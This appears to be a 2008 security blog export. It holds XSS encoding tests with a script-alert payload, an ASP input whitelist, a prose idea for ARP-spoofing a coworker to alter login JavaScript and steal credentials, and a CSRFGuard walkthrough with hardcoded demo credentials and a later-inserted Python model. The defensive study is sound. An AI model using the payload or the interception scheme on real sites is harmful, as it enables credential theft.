com.opensymphony.xwork2.util.TextUtils with spec chars: </b><strong><font color="#ff0000">&lt;script&gt;alert('xss');&lt;/script&gt;</font></strong> </font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;</font> <br /> <font color="#800000">#32463;&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;</font> 
<br /> <font color="#800000">&amp;#22312;&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;</font> <br /> <font color="#800000">&amp;#32531;&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;</font> <br /> <font color="#800000">&amp;#24635;&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;</font> <br /> <font color="#800000">#32493;&amp;#25918;&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;</font> <br /> <font color="#800000">&amp;#30408;&amp;#20313;&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;</font> <br /> <font color="#800000">#22269;&amp;#22806;&amp;#36152;&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;</font> <br /> <font color="#800000">&amp;#34701;&amp;#39118;&amp;#26292;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;</font> <br /> <font color="#800000">&amp;#26426;&amp;#19982;&amp;#26426;&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>apache commons unescape then escape with StringEscapeUtils: </b><font color="#ff0000"><strong>&lt;script&gt;alert('xss');&lt;/script&gt;</strong> </font> </font> <br /> <font color="#800000">&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;</font> <br /> <font color="#800000">&#32531; &#20013;&#22269;&#32463;&#27982;&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;</font> <br /> <font color="#800000">&#25918;&#32531;&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;</font> <br /> <font color="#800000">&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;</font> 
<br /> <font color="#800000">&#26376;&#36152;&#26131;&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;</font> <br /> <font color="#800000">&#36152;&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;</font> <br /> <font color="#800000">&#38754;&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><form action="AscetikServlet" method="POST" ></font> <br /> <font color="#800000"><input type="text" id="input" name="input" ></font> <br /> <font color="#800000"><input type="submit" ></font> <br /> <font color="#800000"></form></font> <br /> <font color="#800000"></body></font> <br /> <font color="#800000"></html></font> <br /> </td><br /> </tr><br /> </tbody></table><br /></blockquote><br /><strong>References:</strong><br /><em>Apache Commons Lang: <a title="http://commons.apache.org/lang/" href="http://commons.apache.org/lang/">http://commons.apache.org/lang/</a></em><br /><em>Struts 1: <a title="http://struts.apache.org/" href="http://struts.apache.org/">http://struts.apache.org/</a></em><br /><em>Struts 2: <a title="http://struts.apache.org/2.x/" href="http://struts.apache.org/2.x/">http://struts.apache.org/2.x/</a></em><br /><em>WebWork: <a title="http://www.opensymphony.com/webwork/" href="http://www.opensymphony.com/webwork/">http://www.opensymphony.com/webwork/</a></em><br /><em>My code: <a title="http://my-security-projects.googlecode.com/files/testEncoding.war" href="http://my-security-projects.googlecode.com/files/testEncoding.war">http://my-security-projects.googlecode.com/files/testEncoding.war</a></em><br /><em>My code is written for Tomcat 6 with Java 1.6 and all the above libraries.</em>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-29090399365392614252008-10-10T22:55:00.005-05:002008-10-23T23:10:07.795-05:00God doesn't play dice. 
Quantum Crypto is Closer.<p>A quantum crypto device has finally been tested and demonstrated to the BBC. It will be interesting to see how the devices hold up. Quantum Crypto is based on an odd principle of quantum theory called the Heisenberg Uncertainty Principle. It states that the act of observing an experiment changes the outcome. The current model communicates over fiber optic cable and can communicate with 5 locations in Vienna. Due to the above mentioned principle, if someone were to perform a MiTM attack or sniff the traffic it would change the outcome of the desired result. The system would then produce a very high rate of errors, and once this is detected the system will automatically shut itself down to prevent the interception of any confidential data. They are claiming that this will be an unbreakable encryption, and I agree: if it truly conforms to the Heisenberg Uncertainty Principle then it should be unbreakable. It will be interesting to see how many governments allow this technology within their borders once it is perfected. Most governments want at least a backdoor or a limit on the encryption strength. They have made the system robust and able to reroute itself in case a quantum link breaks down, so as not to lose data between the two links.</p><p><br /></p><p><br /></p> <p><em>"We are constantly in touch with insurance companies and banks, and they say it's nearly better that they lose 10m euros than if the system is down for two hours, because that might be more damaging for the bank," said Dr Huebel.</em></p> <p><br /></p><p><br /></p> <p>But one thing I have learned in security: never say you are unbreakable. 
It would be interesting to see if hackers find a flaw in quantum theory that physicists including Albert Einstein have overlooked for years.<br /></p><p><br /></p><p>Source: <a title="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm" href="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm">http://news.bbc.co.uk/2/hi/science/nature/7661311.stm</a></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-43694279346571436542008-10-10T15:51:00.002-05:002008-10-23T23:10:53.882-05:00Ghetto Input validation.<p>I was consulting on a project a few months ago that had very little budget but kept getting hacked weekly. The application was in ASP, but that does not really matter for the point I'm about to make. Since they had very little money and very little time, and I wanted to perform very strict input validation, I came up with a solution that I am surprised I have never seen before. <em>Why not just validate the entire query string instead of individual parameters?</em> The site has very few POST parameters and kept getting hacked through its GET parameters, so I wrote a simple ASP script that I could add to the beginning of every page. If that validation fails, the page redirects to an error page; otherwise the page code executes. I validated the POST params individually since there were so few. I know that what these guys really needed to do was use bind-variable (parameterized) queries, but there was a lot of SQL and they only accepted alphanumeric input, upper and lower case letters. Can anyone think of a way this could be exploited? One quick statement and we stopped all XSS and SQL injection attacks against this site. These guys were also a very small business that could not afford to be down for days while the code was being developed. 
For an enterprise I probably would not recommend this, but for a small startup or local business I think this could really help.</p> <p> </p> <p>Here is my Classic ASP code.</p> <p><strong>Validation.asp</strong></p> <p>Function ValidateQueryString(input) <br />    Dim re <br />    Set re = New RegExp <br />    ' Allow only letters, digits, "=", "&" and space; any other character <br />    ' (quotes, angle brackets, "%", ";" ...) fails the whole request. <br />    re.Global = True <br />    re.Pattern = "^[a-zA-Z0-9\=\&\ ]+$" <br />    If re.Test(input) Or input = "" Then <br />        ValidateQueryString = True <br />    Else <br />        ValidateQueryString = False <br />    End If <br />End Function</p> <p> </p> <p><strong>every page will include this line at the top...</strong></p> <p><!--#include file="Validation.asp" --> <br /><% <br />' Request.QueryString without a key is the whole raw, still URL-encoded <br />' query string, so encoded characters such as %27 are rejected before decoding. <br />If ValidateQueryString(Request.QueryString) = False Then <br />    Response.Redirect("error.asp") <br />End If <br />%></p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-25594229003069975622008-10-09T22:27:00.007-05:002008-10-23T23:11:21.810-05:00No longer confident.<p>This is something that has really started to annoy me ever since I realized it. It came to me while I was playing with ettercap filters. For those who don't know, you can use ettercap to perform ARP spoofing and MiTM attacks. Ettercap filters give you the added functionality to modify any traffic going to and from the victim or victims that you are ARP spoofing. This has been fun to do things like replace all the images in webpages that your co-worker has been viewing with your own image that you host. 
Like the following.</p> <p><br /></p><div style="text-align: center;"><a href="http://lh4.ggpht.com/ascetik/SO7LgYy8b8I/AAAAAAAAA-Q/9o3ZnMQvQ8s/s1600-h/image%5B2%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh6.ggpht.com/ascetik/SO7LhTxi5kI/AAAAAAAAA-U/ixb-H07iW20/image_thumb.png?imgmax=800" border="0" width="244" height="213" /></a></div><p> </p> <p><br /></p><p>That's fun and all, but now I have noticed something that a lot of websites, including many financial institutions, are doing. They are trying (I assume) to make their home pages load faster by not SSL'ing their home page but still providing login functionality on this page. They usually have a JavaScript function that actually submits your credentials over SSL, or it could be in a form. So it occurred to me that anyone who happens to be on my same subnet can ARP spoof me and change the JavaScript. The JavaScript could be modified to intercept my credentials, send them to another server, and still log me in, and I would never know it. In fact I'm not sure of anything that most users can do to know that they are not a victim.<br /></p><p style="text-align: center;"><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_acrzuhZS74A/SPDWMb5PN-I/AAAAAAAAA-o/jZL0Cr1x4NA/s1600-h/bad.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_acrzuhZS74A/SPDWMb5PN-I/AAAAAAAAA-o/jZL0Cr1x4NA/s320/bad.jpg" alt="" id="BLOGGER_PHOTO_ID_5255936274275973090" border="0" /></a><br /></p><p><br /></p> <p>This is a poor coding practice that takes away all the visual cues that browsers are putting in place to ensure that you are sending your credentials over a secure link, and it trains users not to look for them. It's not that hard to have a button that says "click here to sign in" to redirect you to an SSL'd login page. 
I have seen some sites that are SSL'd but load some of their JavaScript from non-SSL'd sources, which could allow for session stealing even from sites that do set their cookies securely. My recommendations to developers are:</p><p>1. Only allow your users to enter credentials on an SSL'd page.</p><p>2. Once users are on a secure section of the site, load all your JavaScript, images, or any other included content only from SSL'd sources as well.</p><p><br /></p> <p style="text-align: center;"><a href="http://lh6.ggpht.com/ascetik/SO7Lh3TQVrI/AAAAAAAAA-Y/Vm-Z5Jon0bI/s1600-h/image%5B5%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh5.ggpht.com/ascetik/SO7LiKGWkzI/AAAAAAAAA-c/k_8wlQgyPJI/image_thumb%5B1%5D.png?imgmax=800" border="0" width="239" height="102" /></a><br /></p><p style="text-align: center;"> <a href="http://lh5.ggpht.com/ascetik/SO7LiWcZmGI/AAAAAAAAA-g/LRYG8-xitlE/s1600-h/image%5B8%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh5.ggpht.com/ascetik/SO7LiVtFLsI/AAAAAAAAA-k/9QDFUN_RE_Y/image_thumb%5B2%5D.png?imgmax=800" border="0" width="217" height="61" /></a></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-44863940874527040652008-06-12T00:42:00.002-05:002008-10-23T23:11:54.338-05:00CSRFGuard Take 2<p>Well I have been doing a little more experimentation with CSRFGuard and realized I had a flawed configuration in my last post. I figured that the initial page (say your login page) had to be outside your CSRF protected filter because you do not have a session and therefore no CSRF token, and the filter would fail. But it fails open. At first I thought this was a flaw, but this makes perfect sense. You can now protect all your content with one CSRF filter and not have to keep a special directory unprotected for your login pages and the like. </p> <p> </p> <p>Another trick that CSRFGuard does is to automatically add your CSRF token to your links in most cases. 
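</p>
<p>A stand-alone model of the behaviour described above, added here as an example and not CSRFGuard's own code: a session-bound OWASP_CSRFTOKEN, a filter that fails open while no session holds a token, the Log and Invalidate actions followed by the Redirect on a bad token, and a server-side response handler that appends the token to links and forms. It also covers the two problems reported further down in this post, the doubled token on rewritten links and the credentials that end up in the log. Session, Request and the redact() step are assumptions, not CSRFGuard APIs.</p>

```python
import hmac
import logging
import re
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Added example modelling the filter behaviour described in the post; this is
# not CSRFGuard's code, and Session/Request are stand-ins for the servlet API.
TOKEN_NAME = "OWASP_CSRFTOKEN"             # TokenName from csrfguard.properties
ERROR_PAGE = "error.jsp"                   # Redirect.param.ErrorPage
SENSITIVE = {"password", "passwd", "pwd"}  # assumption: never written to a log

log = logging.getLogger("csrfguard")


@dataclass
class Session:
    attrs: dict = field(default_factory=dict)
    valid: bool = True

    def invalidate(self) -> None:
        self.attrs.clear()
        self.valid = False


@dataclass
class Request:
    method: str
    uri: str
    params: dict
    session: Optional[Session] = None   # None: no session yet (login page)


def generate_token(nbytes: int = 32) -> str:
    """Fresh per-session token from the OS CSPRNG, base64url encoded."""
    return secrets.token_urlsafe(nbytes)


def redact(params: dict) -> dict:
    """Mask credential parameters so a failed login POST (the case shown in
    the post's log) does not put the user's password into the log line."""
    return {k: ("***" if k.lower() in SENSITIVE else v) for k, v in params.items()}


def csrf_filter(req: Request) -> str:
    """Return 'pass' or 'redirect:<page>'; on a bad token run the Log and
    Invalidate actions first, then hand back the Redirect."""
    sess = req.session
    if sess is None or TOKEN_NAME not in sess.attrs:
        # Fail open: there is nothing to compare against until a session holds
        # a token, which is why the login page can sit inside the filter mapping.
        return "pass"
    expected = sess.attrs[TOKEN_NAME].encode()
    supplied = req.params.get(TOKEN_NAME, "").encode()
    if hmac.compare_digest(expected, supplied):    # constant-time comparison
        return "pass"
    log.warning("caught CSRF attack (Method: %s URI: %s Parameters: %s)",
                req.method, req.uri, redact(req.params))
    sess.invalidate()
    return "redirect:" + ERROR_PAGE


_HREF = re.compile(r'href=(["\'])([^"\']*)\1', re.I)


def rewrite_response(html: str, token: str) -> str:
    """Server-side response handler: append the token to same-site links and
    add a hidden field to each form. Both steps skip content that already
    carries the token, so rewriting the same response twice cannot produce
    the doubled token the post shows on its generated links."""
    def add_to_link(m: re.Match) -> str:
        quote, url = m.group(1), m.group(2)
        if TOKEN_NAME + "=" in url or url.startswith(
                ("http://", "https://", "//", "#", "javascript:")):
            return m.group(0)   # already tokenised, off-site, or not a page of this app
        sep = "&" if "?" in url else "?"
        return f"href={quote}{url}{sep}{TOKEN_NAME}={token}{quote}"

    html = _HREF.sub(add_to_link, html)
    if f'name="{TOKEN_NAME}"' not in html:
        hidden = f'<input type="hidden" name="{TOKEN_NAME}" value="{token}">'
        html = re.sub(r"</form>", lambda _m: hidden + "</form>", html, flags=re.I)
    return html


if __name__ == "__main__":
    logging.basicConfig(format="%(levelname)s [CSRFGuard] %(message)s")
    sess = Session()
    sess.attrs[TOKEN_NAME] = generate_token()
    # Constructed page in the shape of the post's generated HTML.
    page = ('<a href="csrfProtectedArea2.jsp" > Click Here </a>'
            '<form method="POST" action="index.jsp"></form>')
    print(rewrite_response(page, sess.attrs[TOKEN_NAME]))
    forged = Request("POST", "/CSRFTest/index.jsp",
                     {"username": "Guest", "password": "Guest1"}, sess)
    print(csrf_filter(forged), "| session valid:", sess.valid)
```

<p>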
Automatic link rewriting makes it easier to integrate CSRFGuard into an existing application and makes it trivial to ensure that every request is sending the CSRF token without you having to code around it. I found that for some dynamically generated code, like response.sendRedirect("index.jsp");, this will not work without a little help. </p> <p> </p> <p>There are a few different response handlers that you can set in the csrfguard.properties for CSRFGuard to automatically add your token to your HTML. They are: </p> <p><strong>org.owasp.csrfguard.handlers.HTMLParserHandler</strong> will automatically parse the HTML response for URLs to attach the CSRF token to. This is performed server side. </p> <p><strong>org.owasp.csrfguard.handlers.RegExHandler</strong> will allow you to specify a regular expression that is searched for in the HTML response, and then append the token to each match. This action again is performed on the server side. I have not tried this one yet.</p> <p><strong>org.owasp.csrfguard.handlers.JavaScriptHandler</strong> will include JavaScript (csrf.js) in your response. This will append CSRF tokens on the client and save you some processor time on the server.</p> <p> </p> <p><strong>The Example</strong> </p> <p>I will walk you through my example, which consists of a login page and 2 CSRF protected areas. </p> <p>Here is my basic login page. It does 3 things. (1) If there isn't a session then you are presented with the logon page. (2) If you are submitting your credentials then it checks them and adds the generated CSRF token and your user ID to the session. The latter is solely to represent a user and has nothing to do with CSRFGuard. Ideally this app would query a SQL database or LDAP, but I'm trying to keep it simple. 
(3) If you are logged in already and access the logon page then you are redirected back to csrfProtectedArea1.do </p> <p> </p> <p><font color="#0000a0"><%@ page language="java" contentType="text/html; charset=ISO-8859-1" <br />    pageEncoding="ISO-8859-1"%> <br /><jsp:directive.page import="org.owasp.csrfguard.util.*"/> <br /><jsp:directive.page import="javax.servlet.http.*"/> </font></p> <p><font color="#0000a0"><%@ page session="true" %> </font></p> <p><font color="#0000a0"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>LogIn Page</title> <br /></head> <br /><body> </font></p> <p><font color="#0000a0"><% </font></p> <p><font color="#0000a0">String login = ""; <br />String username = ""; <br />String password = ""; </font></p> <p><font color="#0000a0">login = request.getParameter("Login"); </font></p> <p><font color="#0000a0">// Login is set to 1 when the credentials are sent; not really necessary. 
</font></p> <p><font color="#0000a0">if(login != null && login.equals("1")) <br />{ <br />    username = request.getParameter("username"); <br />    password = request.getParameter("password"); <br />    if(username != null && password != null && username.equals("Guest") && password.equals("Guest1")) <br />    { <br />        HttpSession sess = request.getSession(true); <br />        sess.setAttribute("uid", "1111"); <br />        response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") ); <br />    } <br />    else  // login failed <br />    { <br />        out.write("<h3> Error: Please Log in again </h3><br>"); <br />        out.write("<h1>Please Login Below</h1>"); <br />        out.write("<form method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>"); <br />    } <br />} <br />else if (request.getSession().getAttribute("uid") != null && request.getSession().getAttribute("uid").equals("1111")) <br />{ </font></p> <p><font color="#0000a0">// session is active and the userid matches. 
<br />    HttpSession sess = request.getSession(true); <br />    response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + sess.getAttribute("OWASP_CSRFTOKEN") ); <br />} <br />else <br />{ </font></p> <p><font color="#0000a0">// normal login when a session is not present </font></p> <p><font color="#0000a0">        out.write("<h1>Please Login Below.</h1>"); <br />        out.write("<form  method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>"); <br />} </font></p> <p><font color="#0000a0">%> </font></p> <p><font color="#0000a0"></body> <br /></html></font> </p> <p> </p> <p><strong>Automatic Generation of Tokens </strong></p> <p>Now in the above code you will notice the following: </p> <p>response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") ); </p> <p>I'm calling request.getParameter, but my form submission looks like this, with no CSRF token parameter, because the filter will add it to the HTML automatically. 
</p> <p>   <font color="#0000a0">     out.write("<h1>Please Login Below.</h1>"); <br />        out.write("<form  method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>");</font> </p> <p> </p> <p>My generated HTML on the client for the login page looks like this: </p> <p><font color="#0000a0"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>LogIn Page</title> <br /></head> <br /><body><h1>Please Login Below.</h1><form  method="POST" action="index.jsp"><br> User Name: <input type="text" name="username"><br> Password:  <input type="password" name="password"><input type="hidden" name="Login" value="1"><br> <input type="submit" name="loginBtn" value="Login" >    <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T></form> </font></p> <p><font color="#0000a0"></body> <br /></html></font> </p> <p> </p> <p>As you can see, the <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T> is automatically generated by the HTMLParserHandler. </p> <p>Now let's look at csrfProtectedArea1.java. This page is session protected and CSRF protected. 
</p> <p><font color="#0000a0">import java.io.IOException; <br />import java.io.PrintWriter; <br />import javax.servlet.*; <br />import javax.servlet.http.*; </font></p> <p><font color="#0000a0">public class csrfProtectedArea1 extends HttpServlet { <br />    private static final long serialVersionUID = -6429166168752177032L; </font></p> <p><font color="#0000a0">    // The CSRFGuard filter mapped to *.do has already checked the token before <br />    // this runs; the servlet itself only checks that the session is logged in. <br />    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException <br />    { </font></p> <p><font color="#0000a0">        HttpSession sess = request.getSession(); <br />        if(sess.getAttribute("uid") != null && sess.getAttribute("uid").equals("1111")) <br />        { <br />            response.setContentType("text/html"); <br />            PrintWriter out = response.getWriter(); <br />            out.println("<html>"); <br />            out.println("<body>"); <br />            out.println("You Made it<br>"); <br />            out.println("<a href=\"csrfProtectedArea2.jsp\" > Click Here </a>"); <br />            out.println("<a href=\"index.jsp\" > Click Here </a>"); <br />            out.println("</body>"); <br />            out.println("</html>"); <br />        } <br />        else <br />        { <br />            response.sendRedirect("/CSRFTest/error.jsp"); <br />        } <br />    } <br />}</font> </p> <p>The generated HTML from this looks like the following. 
</p> <p><font color="#0000a0"><html> <br /><body> <br />You Made it<br> <br /><a href="csrfProtectedArea2.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a> <br /><a href="index.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a> <br /></body> <br /></html></font> </p> <p>I have two links in this response. One goes back to the login page (index.jsp) and the other goes to another CSRF protected area. As you can see, the response handler automatically updates all links found in the HTML with the CSRF token. One error I keep getting is that the first link gets 2 tokens added to it. I have not figured this out yet, but it does not prevent the application from functioning properly. </p> <p> </p> <p><strong>CSRFGuard Handles the Attack </strong></p> <p>One other cool thing about CSRFGuard is that if you submit a request with a missing or incorrect token, CSRFGuard will invalidate your session and redirect you to the error page defined in the csrfguard.properties file. </p> <p>One problem I have found with this is in the logging. For instance, here is an example log file from a failed CSRF request. 
</p> <p> </p> <p><font face="Courier">Jun 12, 2008 12:12:31 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] the following properties were loaded into CSRFGuard <br />     Debug:            true <br />     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler <br />     Token Name:        OWASP_CSRFTOKEN <br />     Token Length:        32 <br />     PRNG:            SHA1PRNG <br />     Action Count:        3 <br />        Action(0)    org.owasp.csrfguard.actions.Redirect <br />        Action(1)    org.owasp.csrfguard.actions.Log <br />        Action(2)    org.owasp.csrfguard.actions.Invalidate </font></p> <p><font face="Courier">Jun 12, 2008 12:14:28 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] the following properties were loaded into CSRFGuard <br />     Debug:            true <br />     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler <br />     Token Name:        OWASP_CSRFTOKEN <br />     Token Length:        32 <br />     PRNG:            SHA1PRNG <br />     Action Count:        3 <br />        Action(0)    org.owasp.csrfguard.actions.Redirect <br />        Action(1)    org.owasp.csrfguard.actions.Log <br />        Action(2)    org.owasp.csrfguard.actions.Invalidate </font></p> <p><font face="Courier">Jun 12, 2008 12:14:59 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2FcsrfProtectedArea1.do Referer:  Parameters: OWASP_CSRFTOKEN%3DPzEIce4raEWbtC97i8oMgf3Y2yJjf1A1XriZ7GcWaLU) <br />Jun 12, 2008 12:16:36 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2F Referer:  Parameters: ) <br />Jun 12, 2008 12:17:00 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: POST URI: %2FCSRFTest%2Findex.jsp Referer: 
http%3A%2F%2Flocalhost%3A8080%2FCSRFTest%2Findex.jsp%3FOWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5Iu Parameters: <font color="#ff0000">password%3DGuest1</font>%2COWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5I%2CLogin%3D1%2CloginBtn%3DLogin%<font color="#ff0000">2Cusername%3DGuest)</font></font> </p> <p> </p> <p>It will log all parameters from the failed request, which in this case means the username and password of the user. Something to consider if deploying CSRFGuard to a production system. </p> <p> </p> <h3><strong>Additional Information</strong> </h3> <p>Below are the csrfguard.properties and the web.xml I used. </p> <p>csrfguard properties file: </p> <p>org.owasp.csrfguard.Debug=true <br />org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.HTMLParserHandler <br />org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN <br />org.owasp.csrfguard.TokenLength=32 <br />org.owasp.csrfguard.PRNG=SHA1PRNG <br />org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log <br />org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate <br />org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect <br />org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp </p> <p>web.xml </p> <p><?xml version="1.0" encoding="UTF-8"?> <br /><web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5"> <br />  <display-name>CSRFTest</display-name> 
<br />  <welcome-file-list> <br />    <welcome-file>index.html</welcome-file> <br />    <welcome-file>index.htm</welcome-file> <br />    <welcome-file>index.jsp</welcome-file> <br />    <welcome-file>default.html</welcome-file> <br />    <welcome-file>default.htm</welcome-file> <br />    <welcome-file>default.jsp</welcome-file> <br />  </welcome-file-list> <br /><filter> <br />  <filter-name>CSRFGuard</filter-name> <br />  <filter-class>org.owasp.csrfguard.CSRFGuardFilter</filter-class> <br />    <init-param> <br />      <param-name>config</param-name> <br />      <param-value>WEB-INF/csrfguard.properties</param-value> <br />    </init-param> <br /></filter> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><servlet-name>csrfProtectedArea1</servlet-name> <br /></filter-mapping> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><url-pattern>*.do</url-pattern> <br /></filter-mapping> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><url-pattern>*.jsp</url-pattern> <br /></filter-mapping> </p> <p>  <servlet> <br />      <servlet-name>csrfProtectedArea1</servlet-name> <br />      <servlet-class>csrfProtectedArea1</servlet-class> <br />  </servlet> <br />  <servlet-mapping> <br />      <servlet-name>csrfProtectedArea1</servlet-name> <br />      <url-pattern>/csrfProtectedArea1.do</url-pattern> <br />  </servlet-mapping> <br />  </web-app> </p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-35056308895397340072008-06-05T15:48:00.002-05:002008-10-23T23:12:20.151-05:00CSRFGuard Testing<p>Well I have been playing with CSRFGuard lately from the OWASP website. It basically allows you to set up certain pages that are CSRF protected, and whenever a link is selected the HTTP request is parsed for a token that you define and checked against the token in your session. Below is some sample code all running on Tomcat 6X. 
